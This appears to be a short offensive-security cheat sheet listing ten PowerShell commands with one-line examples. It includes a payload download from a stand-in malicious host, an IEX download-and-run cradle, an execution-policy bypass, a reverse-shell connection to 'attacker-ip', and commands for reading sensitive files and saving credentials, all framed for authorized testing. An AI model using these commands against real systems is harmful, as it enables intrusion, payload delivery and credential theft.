10 Essential PowerShell Commands for Offensive Security

Invoke-WebRequest Download files from a URL. This can be used to pull malicious payloads.
```
Invoke-WebRequest -Uri "http://malicious-site.com/payload.exe" -OutFile "payload.exe"
```
Invoke-Expression (IEX) Execute strings or scripts, often used for fileless attacks by downloading and running scripts in memory.
```
IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/script.ps1')
```
Set-ExecutionPolicy Change the execution policy to allow running scripts. Useful when bypassing script execution restrictions.
```
Set-ExecutionPolicy Bypass -Scope Process -Force
```
Get-WmiObject Gather detailed information about the target machine, including OS details, hardware specs, and processes.
```
Get-WmiObject -Class Win32_OperatingSystem
```
Get-Process List all running processes. Often used for identifying running services or processes that can be exploited.
```
Get-Process
```
Start-Process Execute a process on the target machine, useful for starting a new payload or running privilege escalation techniques.
```
Start-Process "cmd.exe" -ArgumentList "/c whoami"
```
New-Object System.Net.Sockets.TCPClient Create a reverse shell by opening a TCP connection.
```
$client = New-Object System.Net.Sockets.TCPClient("attacker-ip", 4444)
```
Get-Content Read the contents of a file. It can be used for exfiltrating sensitive data.
```
Get-Content "C:\sensitive-data.txt"
```
Out-File Write data to a file. Useful for saving stolen credentials or logs.
```
Get-Credential | Out-File "credentials.txt"
```
Add-Type Inject C# code directly into PowerShell, enabling the use of advanced .NET functionalities or custom code execution.

Add-Type -TypeDefinition @"
public class Exploit {
    public static void Run() {
        // malicious code
    }
}
"@
[Exploit]::Run()

Note: The usage of these commands is for educational and authorized testing purposes only. Always ensure you have permission before engaging in offensive security activities.